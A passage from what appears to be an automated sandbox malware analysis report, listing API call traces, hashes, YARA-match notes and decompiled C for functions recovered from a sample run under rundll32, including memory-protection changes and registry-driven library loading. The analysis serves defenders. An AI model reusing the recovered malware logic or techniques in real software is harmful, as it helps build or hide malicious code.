                                          • GetLastError.KERNEL32(0000EA60,00000000,00000000,00000000,?,00B6A6B6,?,?,00000000,00B5D3E9,?,00000000), ref: 00B6C11E
                                            • Part of subcall function 00B5F123: lstrlen.KERNEL32(00000000,00000008,00000000,00000000,?,?,00B6C0A9,00000000,00000000,00000004,00000000,?,00B6A6B6,?,?,00000000), ref: 00B5F12F
                                            • Part of subcall function 00B5F123: memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,00B6C0A9,00000000,00000000,00000004,00000000,?,00B6A6B6,?), ref: 00B5F18D
                                            • Part of subcall function 00B5F123: lstrcpy.KERNEL32(00000000,00000000), ref: 00B5F19D
                                          • SetEvent.KERNEL32(?,00B6A6B6,?,?,00000000,00B5D3E9,?,00000000), ref: 00B6C110
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Event$ErrorLastReset$lstrcpylstrlenmemcpy
                                          • String ID:
                                          • API String ID: 1449191863-0
                                          • Opcode ID: dfa11efa456a2f137c8709a26c15811f2ffcb44faf2517a5ec3839de5d4cddc8
                                          • Instruction ID: dc3691e93cd49b55bb03279b35a00227b7ed7849232003776425daac62376e58
                                          • Opcode Fuzzy Hash: dfa11efa456a2f137c8709a26c15811f2ffcb44faf2517a5ec3839de5d4cddc8
                                          • Instruction Fuzzy Hash: 5311C231100209EFDB206F60DC45EAB7FE9EF053A1F104661F959A24A2DB39DCA5DB60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00B69F3E Relevance: 7.6, APIs: 5, Instructions: 55memorystringCOMMON
                                          Download Yara Rule
                                          APIs
                                          • RtlAllocateHeap.NTDLL(00000000,00004000,-00000008), ref: 00B69F55
                                            • Part of subcall function 00B5E628: WaitForSingleObject.KERNEL32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,00000008,?,00000000,00000000), ref: 00B5E63F
                                            • Part of subcall function 00B5E628: SetEvent.KERNEL32(?,?,?,?,00B5D3E9,?,?), ref: 00B5E64F
                                          • lstrlen.KERNEL32(?,?,?,?,?,00B6055F,?,?), ref: 00B69F78
                                          • lstrlen.KERNEL32(?,?,?,?,00B6055F,?,?), ref: 00B69F82
                                          • memcpy.NTDLL(?,?,00004000,?,?,00B6055F,?,?), ref: 00B69F93
                                          • HeapFree.KERNEL32(00000000,?,?,?,?,00B6055F,?,?), ref: 00B69FB5
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Heaplstrlen$AllocateEventFreeObjectSingleWaitmemcpy
                                          • String ID:
                                          • API String ID: 442095154-0
                                          • Opcode ID: e25c5bc85f22aadacd77a12600528c6331a7870832a532ffe488691ec1cb6e8d
                                          • Instruction ID: 7401bb588b3847cf845d1596944f649ea30e1b5a79dca538168275cf20f17d72
                                          • Opcode Fuzzy Hash: e25c5bc85f22aadacd77a12600528c6331a7870832a532ffe488691ec1cb6e8d
                                          • Instruction Fuzzy Hash: 08118B75A00204EFDB119F54EC84E5ABBF9EB85321F2184A4F90AE3260DB35ED409B20
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00B565B6 Relevance: 7.5, APIs: 5, Instructions: 49memorystringCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00B5ADF8: lstrlen.KERNEL32(?,00000008,-00000007,?,00000000,00B6A2DC,?,00000000,-00000007,00B6377E,-00000007,?,00000000), ref: 00B5AE07
                                            • Part of subcall function 00B5ADF8: mbstowcs.NTDLL ref: 00B5AE23
                                          • lstrlenW.KERNEL32(00000000,76DDF560,00000000,?,00000000,?,?,00B55512,00000020), ref: 00B565E2
                                          • RtlAllocateHeap.NTDLL(00000000,?), ref: 00B565F4
                                          • CreateDirectoryW.KERNEL32(00000000,00000000,?,?,00B55512,00000020), ref: 00B56611
                                          • lstrlenW.KERNEL32(00000000,?,?,00B55512,00000020), ref: 00B5661D
                                          • HeapFree.KERNEL32(00000000,00000000,?,?,00B55512,00000020), ref: 00B56631
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: lstrlen$Heap$AllocateCreateDirectoryFreembstowcs
                                          • String ID:
                                          • API String ID: 3403466626-0
                                          • Opcode ID: ca1605143eec9267e005ef7d410e593ebdd006e452f58772731612a8735eb41c
                                          • Instruction ID: 40ad90955e7f5a57bfeb548cad3d8682aec10092bce5b6660308c477792bc6d3
                                          • Opcode Fuzzy Hash: ca1605143eec9267e005ef7d410e593ebdd006e452f58772731612a8735eb41c
                                          • Instruction Fuzzy Hash: 41014C72101204BFD7119F98EC88FDE7BECEF49312F114095FA0997260CBB49D888B65
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00B69EC4 Relevance: 7.5, APIs: 5, Instructions: 45libraryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetModuleHandleA.KERNEL32 ref: 00B69EE4
                                          • GetModuleHandleA.KERNEL32 ref: 00B69EF2
                                          • LoadLibraryExW.KERNEL32(?,?,?), ref: 00B69EFF
                                          • GetModuleHandleA.KERNEL32 ref: 00B69F16
                                          • GetModuleHandleA.KERNEL32 ref: 00B69F22
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: HandleModule$LibraryLoad
                                          • String ID:
                                          • API String ID: 1178273743-0
                                          • Opcode ID: 40052a23d929c8801fb153c098ca5abae430785a746cc916fbbf981b129114df
                                          • Instruction ID: 7723d9d3d332e39a2ddd2961c0d6f9ea54269d0f47a23ddc45a19267fb4e264a
                                          • Opcode Fuzzy Hash: 40052a23d929c8801fb153c098ca5abae430785a746cc916fbbf981b129114df
                                          • Instruction Fuzzy Hash: 4A01A93170020AAFDB015FA9EC44A6A3BEAFF183603010436F919C2170DF71DC619BA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00B5B7FA Relevance: 7.5, APIs: 5, Instructions: 42stringCOMMON
                                          Download Yara Rule
                                          APIs
                                          • StrChrA.SHLWAPI(00000000,0000003D,00000000,00000000,?,00B71EAE), ref: 00B5B800
                                          • StrTrimA.SHLWAPI(00000001,?,?,00B71EAE), ref: 00B5B823
                                          • StrTrimA.SHLWAPI(00000000,?,?,00B71EAE), ref: 00B5B832
                                          • _strupr.NTDLL ref: 00B5B835
                                          • lstrlen.KERNEL32(00000000,00B71EAE), ref: 00B5B83D
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Trim$_struprlstrlen
                                          • String ID:
                                          • API String ID: 2280331511-0
                                          • Opcode ID: 7e24fefcf9883fa95b79ffd8d2ce3ed8ebff7603c3e27f10d4c1f7216451c63d
                                          • Instruction ID: 5cb8ec1741545536aa7eabedf018bd690acddaa10d8d889a50de1345d7074496
                                          • Opcode Fuzzy Hash: 7e24fefcf9883fa95b79ffd8d2ce3ed8ebff7603c3e27f10d4c1f7216451c63d
                                          • Instruction Fuzzy Hash: 6CF06D31241016AFE6199B24EC8DE7B37EDEB49711B050098F509DB251EF249C4187A5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00B5E726 Relevance: 7.5, APIs: 5, Instructions: 42memoryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • RtlEnterCriticalSection.NTDLL(00B79420), ref: 00B5E731
                                          • RtlLeaveCriticalSection.NTDLL(00B79420), ref: 00B5E742
                                          • VirtualProtect.KERNEL32(?,00000004,00000040,0000007F,?,?,00B574E7,?,?,00B79448,00B5340D,00000003), ref: 00B5E759
                                          • VirtualProtect.KERNEL32(?,00000004,0000007F,0000007F,?,?,00B574E7,?,?,00B79448,00B5340D,00000003), ref: 00B5E773
                                          • GetLastError.KERNEL32(?,?,00B574E7,?,?,00B79448,00B5340D,00000003), ref: 00B5E780
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CriticalProtectSectionVirtual$EnterErrorLastLeave
                                          • String ID:
                                          • API String ID: 653387826-0
                                          • Opcode ID: 9c912ba463bc578db30f21a14ff5d29140a90c81a5824150c7dcbbad81fef27b
                                          • Instruction ID: 9cf23a37b65f2ab5776e5421ed77ef7b306cd294e0403f8aac61845a56493332
                                          • Opcode Fuzzy Hash: 9c912ba463bc578db30f21a14ff5d29140a90c81a5824150c7dcbbad81fef27b
                                          • Instruction Fuzzy Hash: B901A276100304EFD7219F54CC04E6ABBF9FF88321B1185A9EA5A93760DB30EE05CB60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00B6199F Relevance: 7.5, APIs: 5, Instructions: 37COMMON
                                          Download Yara Rule
                                          APIs
                                          • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00B65D07,?), ref: 00B619A7
                                          • GetVersion.KERNEL32 ref: 00B619B6
                                          • GetCurrentProcessId.KERNEL32 ref: 00B619D2
                                          • OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 00B619EF
                                          • GetLastError.KERNEL32 ref: 00B61A0E
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Process$CreateCurrentErrorEventLastOpenVersion
                                          • String ID:
                                          • API String ID: 2270775618-0
                                          • Opcode ID: 7ea8cfe6a20760856b4d3ed9b1a884c326900d2950d19d126bb9d49f56e82bab
                                          • Instruction ID: c70bf39ab10f47dc533ad83917c76d87d146a8ce9efc6edaa7f6f95f7b7e9eff
                                          • Opcode Fuzzy Hash: 7ea8cfe6a20760856b4d3ed9b1a884c326900d2950d19d126bb9d49f56e82bab
                                          • Instruction Fuzzy Hash: A8F0AF30681302EBD7209BB8AC1DB543BF5E704B47F540969E66AE75E0DF7484D1CB14
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00B5F9D0 Relevance: 7.5, APIs: 5, Instructions: 35synchronizationthreadCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetCurrentThreadId.KERNEL32 ref: 00B5F9DD
                                          • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,00000040), ref: 00B5F9ED
                                          • CloseHandle.KERNEL32(00000000,?,?,00000040), ref: 00B5F9F6
                                          • VirtualFree.KERNEL32(000003E8,00000000,00008000,?,00000000,00B57779,?,?,00000040), ref: 00B5FA14
                                          • VirtualFree.KERNEL32(00002710,00000000,00008000,?,00000000,00B57779,?,?,00000040), ref: 00B5FA21
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: FreeVirtual$CloseCurrentHandleObjectSingleThreadWait
                                          • String ID:
                                          • API String ID: 3667519916-0
                                          • Opcode ID: 54832d3b71b3be51f8d7207bb3a9c7315872af47ee5490a320b1eeffa0b2b1a0
                                          • Instruction ID: 5cc445cd7f34f4af23e5583d66026067788082a3bf0215f9b9f455861dc5cdb7
                                          • Opcode Fuzzy Hash: 54832d3b71b3be51f8d7207bb3a9c7315872af47ee5490a320b1eeffa0b2b1a0
                                          • Instruction Fuzzy Hash: F9F03031200B05AFD7216B65EC44F1AB6E8FF44357F1146A5F945D35A0CB24ED89CA25
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00B6F857 Relevance: 6.3, APIs: 5, Instructions: 78memorystringCOMMON
                                          Download Yara Rule
                                          APIs
                                          • lstrlen.KERNEL32(?,00000000,00000000,?,?,?,?,?), ref: 00B6F87B
                                            • Part of subcall function 00B61C01: RtlAllocateHeap.NTDLL(00000000,00000001,00B71A23), ref: 00B61C0D
                                          • wsprintfA.USER32 ref: 00B6F8AC
                                            • Part of subcall function 00B5B175: GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000000,00000030,?,?,?,?,?,?,?,?,?,?,?,00B62B68), ref: 00B5B18B
                                            • Part of subcall function 00B5B175: wsprintfA.USER32 ref: 00B5B1B3
                                            • Part of subcall function 00B5B175: lstrlen.KERNEL32(?), ref: 00B5B1C2
                                            • Part of subcall function 00B5B175: wsprintfA.USER32 ref: 00B5B202
                                            • Part of subcall function 00B5B175: wsprintfA.USER32 ref: 00B5B237
                                            • Part of subcall function 00B5B175: memcpy.NTDLL(00000000,?,?), ref: 00B5B244
                                            • Part of subcall function 00B5B175: memcpy.NTDLL(00000008,00B743E8,00000002,00000000,?,?), ref: 00B5B259
                                            • Part of subcall function 00B5B175: wsprintfA.USER32 ref: 00B5B27C
                                          • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00B6F921
                                            • Part of subcall function 00B7240D: RtlEnterCriticalSection.NTDLL(0614C2D0), ref: 00B72423
                                            • Part of subcall function 00B7240D: RtlLeaveCriticalSection.NTDLL(0614C2D0), ref: 00B7243E
                                          • HeapFree.KERNEL32(00000000,?,?,?,00000001,?,?,?,?,00000000,00000000,?,?,?), ref: 00B6F90B
                                          • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 00B6F917
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: wsprintf$Heap$Free$CriticalSectionTimelstrlenmemcpy$AllocateEnterFileLeaveSystem
                                          • String ID:
                                          • API String ID: 3553201432-0
                                          • Opcode ID: d03cf90b13bf901d0d5e115a50df0299912d3aa1efcad9545703c79da6ea261c
                                          • Instruction ID: 29223274f7f50ca06d4221a2b728e9dac656d41165aa8337edbb1f233671170d
                                          • Opcode Fuzzy Hash: d03cf90b13bf901d0d5e115a50df0299912d3aa1efcad9545703c79da6ea261c
                                          • Instruction Fuzzy Hash: 03212B76800109BFCF01DFA5EC88CDF7BB9FB48310B004466F919A7120D7719A64DB61
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00B6F372 Relevance: 6.3, APIs: 5, Instructions: 76memoryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • HeapFree.KERNEL32(00000000,?), ref: 00B6F3CF
                                          • HeapFree.KERNEL32(00000000,?), ref: 00B6F3E0
                                          • HeapFree.KERNEL32(00000000,?), ref: 00B6F3F8
                                          • CloseHandle.KERNEL32(?), ref: 00B6F412
                                          • HeapFree.KERNEL32(00000000,?), ref: 00B6F427
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: FreeHeap$CloseHandle
                                          • String ID:
                                          • API String ID: 1910495013-0
                                          • Opcode ID: acca0055bc957be95c6f015000ad5a111942619d5167bb2193a59c43d0c90b10
                                          • Instruction ID: 5b636a06cce4026ff5a3dba8f2a7fdbd420cd9b6a60a5ae8e45c669fd965a632
                                          • Opcode Fuzzy Hash: acca0055bc957be95c6f015000ad5a111942619d5167bb2193a59c43d0c90b10
                                          • Instruction Fuzzy Hash: 55214A71601522AFD711DB65EC88C6AFBAAFF49B1131444A4F409D3A20CB35ECA1CBE4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00B530BA Relevance: 6.2, APIs: 4, Instructions: 192COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00B56778: RegOpenKeyA.ADVAPI32(80000002,Software\Microsoft\WAB\DLLPath,?), ref: 00B56793
                                            • Part of subcall function 00B56778: LoadLibraryA.KERNEL32(00000000,?,?,?,?), ref: 00B567E1
                                            • Part of subcall function 00B56778: GetProcAddress.KERNEL32(00000000,?), ref: 00B567FA
                                            • Part of subcall function 00B56778: RegCloseKey.ADVAPI32(?,?,?,?,?), ref: 00B5684B
                                          • GetLastError.KERNEL32(?,?,?), ref: 00B53248
                                          • FreeLibrary.KERNEL32(?,?,?), ref: 00B532B0
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Library$AddressCloseErrorFreeLastLoadOpenProc
                                          • String ID:
                                          • API String ID: 1730969706-0
                                          • Opcode ID: a9daadcf9e00f06059c7769eebe730496e861b12e65ba5c38f993ab17c676a21
                                          • Instruction ID: 9f3de7b7d2637e5adb16407ee8be98047ad192b1e31ef18cf7f402b3e230c1cf
                                          • Opcode Fuzzy Hash: a9daadcf9e00f06059c7769eebe730496e861b12e65ba5c38f993ab17c676a21
                                          • Instruction Fuzzy Hash: B371E475D00609AFCF01DFE4C884AADBBF9FF48746B1085A9E915A7211D732AE45CF60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 04895D8F Relevance: 6.2, APIs: 4, Instructions: 154memorystringCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 46%
                                          			E04895D8F(intOrPtr* __eax) {
				void* _v8;
				WCHAR* _v12;
				void* _v16;
				char _v20;
				void* _v24;
				intOrPtr _v28;
				void* _v32;
				intOrPtr _v40;
				short _v48;
				intOrPtr _v56;
				short _v64;
				intOrPtr* _t54;
				intOrPtr* _t56;
				intOrPtr _t57;
				intOrPtr* _t58;
				intOrPtr* _t60;
				void* _t61;
				intOrPtr* _t63;
				intOrPtr* _t65;
				short _t67;
				intOrPtr* _t68;
				intOrPtr* _t70;
				intOrPtr* _t72;
				intOrPtr* _t75;
				intOrPtr* _t77;
				intOrPtr _t79;
				intOrPtr* _t83;
				intOrPtr* _t87;
				intOrPtr _t103;
				intOrPtr _t109;
				void* _t118;
				void* _t122;
				void* _t123;
				intOrPtr _t130;

				_t123 = _t122 - 0x3c;
				_push( &_v8);
				_push(__eax);
				_t118 =  *((intOrPtr*)( *__eax + 0x48))();
				if(_t118 >= 0) {
					_t54 = _v8;
					_t103 =  *0x489a348; // 0x9ad5a8
					_t5 = _t103 + 0x489b038; // 0x3050f485
					_t118 =  *((intOrPtr*)( *_t54))(_t54, _t5,  &_v32);
					_t56 = _v8;
					_t57 =  *((intOrPtr*)( *_t56 + 8))(_t56);
					if(_t118 >= 0) {
						__imp__#2(0x4899290);
						_v28 = _t57;
						if(_t57 == 0) {
							_t118 = 0x8007000e;
						} else {
							_t60 = _v32;
							_t61 =  *((intOrPtr*)( *_t60 + 0xbc))(_t60, _v28,  &_v24);
							_t87 = __imp__#6;
							_t118 = _t61;
							if(_t118 >= 0) {
								_t63 = _v24;
								_t118 =  *((intOrPtr*)( *_t63 + 0x24))(_t63,  &_v20);
								if(_t118 >= 0) {
									_t130 = _v20;
									if(_t130 != 0) {
										_t67 = 3;
										_v64 = _t67;
										_v48 = _t67;
										_v56 = 0;
										_v40 = 0;
										if(_t130 > 0) {
											while(1) {
												_t68 = _v24;
												asm("movsd");
												asm("movsd");
												asm("movsd");
												asm("movsd");
												_t123 = _t123;
												asm("movsd");
												asm("movsd");
												asm("movsd");
												asm("movsd");
												_t118 =  *((intOrPtr*)( *_t68 + 0x2c))(_t68,  &_v8);
												if(_t118 < 0) {
													goto L16;
												}
												_t70 = _v8;
												_t109 =  *0x489a348; // 0x9ad5a8
												_t28 = _t109 + 0x489b0bc; // 0x3050f1ff
												_t118 =  *((intOrPtr*)( *_t70))(_t70, _t28,  &_v16);
												if(_t118 >= 0) {
													_t75 = _v16;
													_t118 =  *((intOrPtr*)( *_t75 + 0x34))(_t75,  &_v12);
													if(_t118 >= 0 && _v12 != 0) {
														_t79 =  *0x489a348; // 0x9ad5a8
														_t33 = _t79 + 0x489b078; // 0x76006f
														if(lstrcmpW(_v12, _t33) == 0) {
															_t83 = _v16;
															 *((intOrPtr*)( *_t83 + 0x114))(_t83);
														}
														 *_t87(_v12);
													}
													_t77 = _v16;
													 *((intOrPtr*)( *_t77 + 8))(_t77);
												}
												_t72 = _v8;
												 *((intOrPtr*)( *_t72 + 8))(_t72);
												_v40 = _v40 + 1;
												if(_v40 < _v20) {
													continue;
												}
												goto L16;
											}
										}
									}
								}
								L16:
								_t65 = _v24;
								 *((intOrPtr*)( *_t65 + 8))(_t65);
							}
							 *_t87(_v28);
						}
						_t58 = _v32;
						 *((intOrPtr*)( *_t58 + 8))(_t58);
					}
				}
				return _t118;
			}





































                                          0x04895d94
                                          0x04895d9d
                                          0x04895d9e
                                          0x04895da2
                                          0x04895da8
                                          0x04895dae
                                          0x04895db7
                                          0x04895dbd
                                          0x04895dc7
                                          0x04895dc9
                                          0x04895dcf
                                          0x04895dd4
                                          0x04895ddf
                                          0x04895de5
                                          0x04895dea
                                          0x04895f0c
                                          0x04895df0
                                          0x04895df0
                                          0x04895dfd
                                          0x04895e03
                                          0x04895e09
                                          0x04895e0d
                                          0x04895e13
                                          0x04895e20
                                          0x04895e24
                                          0x04895e2a
                                          0x04895e2d
                                          0x04895e35
                                          0x04895e36
                                          0x04895e3a
                                          0x04895e3e
                                          0x04895e41
                                          0x04895e44
                                          0x04895e4a
                                          0x04895e53
                                          0x04895e59
                                          0x04895e5a
                                          0x04895e5d
                                          0x04895e5e
                                          0x04895e5f
                                          0x04895e67
                                          0x04895e68
                                          0x04895e69
                                          0x04895e6b
                                          0x04895e6f
                                          0x04895e73
                                          0x00000000
                                          0x00000000
                                          0x04895e79
                                          0x04895e82
                                          0x04895e88
                                          0x04895e92
                                          0x04895e96
                                          0x04895e98
                                          0x04895ea5
                                          0x04895ea9
                                          0x04895eb1
                                          0x04895eb6
                                          0x04895ec8
                                          0x04895eca
                                          0x04895ed0
                                          0x04895ed0
                                          0x04895ed9
                                          0x04895ed9
                                          0x04895edb
                                          0x04895ee1
                                          0x04895ee1
                                          0x04895ee4
                                          0x04895eea
                                          0x04895eed
                                          0x04895ef6
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x04895ef6
                                          0x04895e4a
                                          0x04895e44
                                          0x04895e2d
                                          0x04895efc
                                          0x04895efc
                                          0x04895f02
                                          0x04895f02
                                          0x04895f08
                                          0x04895f08
                                          0x04895f11
                                          0x04895f17
                                          0x04895f17
                                          0x04895dd4
                                          0x04895f20

                                          APIs
                                          • SysAllocString.OLEAUT32(04899290), ref: 04895DDF
                                          • lstrcmpW.KERNEL32(00000000,0076006F), ref: 04895EC0
                                          • SysFreeString.OLEAUT32(00000000), ref: 04895ED9
                                          • SysFreeString.OLEAUT32(?), ref: 04895F08
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.712038836.0000000004891000.00000020.10000000.00040000.00000000.sdmp, Offset: 04890000, based on PE: true
                                          • Associated: 00000002.00000002.712023779.0000000004890000.00000004.10000000.00040000.00000000.sdmpDownload File
                                          • Associated: 00000002.00000002.712055656.0000000004899000.00000002.10000000.00040000.00000000.sdmpDownload File
                                          • Associated: 00000002.00000002.712068436.000000000489A000.00000004.10000000.00040000.00000000.sdmpDownload File
                                          • Associated: 00000002.00000002.712106423.000000000489C000.00000002.10000000.00040000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_4890000_rundll32.jbxd
                                          Similarity
                                          • API ID: String$Free$Alloclstrcmp
                                          • String ID:
                                          • API String ID: 1885612795-0
                                          • Opcode ID: f1209463bbff5d4295f3f0b8156167e77b93c511257818910df37f0dab9c51c5
                                          • Instruction ID: 912d577ff9b15bc3ce1ce05e01dba076b46e755fbba4f504c4fcce0ab9350ee8
                                          • Opcode Fuzzy Hash: f1209463bbff5d4295f3f0b8156167e77b93c511257818910df37f0dab9c51c5
                                          • Instruction Fuzzy Hash: 4E512276D0091AEFCF01DFA8C48899EB7B5FF88705B184A94E915EB310D772AD41CBA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 04893394 Relevance: 6.2, APIs: 4, Instructions: 154memoryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • SysAllocString.OLEAUT32(?), ref: 048933CF
                                          • SysFreeString.OLEAUT32(00000000), ref: 048934B4
                                            • Part of subcall function 04895D8F: SysAllocString.OLEAUT32(04899290), ref: 04895DDF
                                          • SafeArrayDestroy.OLEAUT32(00000000), ref: 04893507
                                          • SysFreeString.OLEAUT32(00000000), ref: 04893516
                                            • Part of subcall function 04893FDD: Sleep.KERNEL32(000001F4), ref: 04894025
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.712038836.0000000004891000.00000020.10000000.00040000.00000000.sdmp, Offset: 04890000, based on PE: true
                                          • Associated: 00000002.00000002.712023779.0000000004890000.00000004.10000000.00040000.00000000.sdmpDownload File
                                          • Associated: 00000002.00000002.712055656.0000000004899000.00000002.10000000.00040000.00000000.sdmpDownload File
                                          • Associated: 00000002.00000002.712068436.000000000489A000.00000004.10000000.00040000.00000000.sdmpDownload File
                                          • Associated: 00000002.00000002.712106423.000000000489C000.00000002.10000000.00040000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_4890000_rundll32.jbxd
                                          Similarity
                                          • API ID: String$AllocFree$ArrayDestroySafeSleep
                                          • String ID:
                                          • API String ID: 3193056040-0
                                          • Opcode ID: 01413e1c766cb8ec1dd6abed8839039a7e21c1a674d5337578d3c74f3de71e4c
                                          • Instruction ID: 2bc1d6004f018c46e25fccc69190e67e550389eb9517610977fd0a7dbc71649d
                                          • Opcode Fuzzy Hash: 01413e1c766cb8ec1dd6abed8839039a7e21c1a674d5337578d3c74f3de71e4c
                                          • Instruction Fuzzy Hash: 6D514C75500A09AFDB02DFA8C844A9EB7F6FF8C700B198928E915DB220DB75ED45CB51
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00B72885 Relevance: 6.1, APIs: 4, Instructions: 140stringCOMMON
                                          Download Yara Rule
                                          APIs
                                          • lstrlen.KERNEL32(?,00000008,0000EA60,?,?,?,00B6C0C1,00000000,0000EA60,00000000,00000000,00000000,?,00B6A6B6,?,?), ref: 00B72891
                                            • Part of subcall function 00B61C01: RtlAllocateHeap.NTDLL(00000000,00000001,00B71A23), ref: 00B61C0D
                                          • ResetEvent.KERNEL32(?,?,?,?,00B6C0C1,00000000,0000EA60,00000000,00000000,00000000,?,00B6A6B6,?,?,00000000,00B5D3E9), ref: 00B72908
                                          • GetLastError.KERNEL32(?,?,?,00B6C0C1,00000000,0000EA60,00000000,00000000,00000000,?,00B6A6B6,?,?,00000000,00B5D3E9,?), ref: 00B72935
                                            • Part of subcall function 00B5C6B8: RtlFreeHeap.NTDLL(00000000,00000000,00B71A9A,00000000), ref: 00B5C6C4
                                          • GetLastError.KERNEL32(?,?,?,00B6C0C1,00000000,0000EA60,00000000,00000000,00000000,?,00B6A6B6,?,?,00000000,00B5D3E9,?), ref: 00B729F7
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ErrorHeapLast$AllocateEventFreeResetlstrlen
                                          • String ID:
                                          • API String ID: 943265810-0
                                          • Opcode ID: 9c08fa3d3e2a23484ce3cc5e86b2090a34c1cdf7602783997186f1c67509f1de
                                          • Instruction ID: a74363b6a44b3b36fde638b57244e549d250b8a8eff6e2b0e8a2537bdda7d9be
                                          • Opcode Fuzzy Hash: 9c08fa3d3e2a23484ce3cc5e86b2090a34c1cdf7602783997186f1c67509f1de
                                          • Instruction Fuzzy Hash: 23417172500205BFDB209FA4CC89EBB7AEDEF04705F044979F65AD61A0DB71DD849B20
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 048935A2 Relevance: 6.1, APIs: 4, Instructions: 136COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 85%
                                          			E048935A2(signed int __eax, void* __eflags, intOrPtr _a4, signed int _a8, signed int _a12, intOrPtr _a16) {
				intOrPtr _v8;
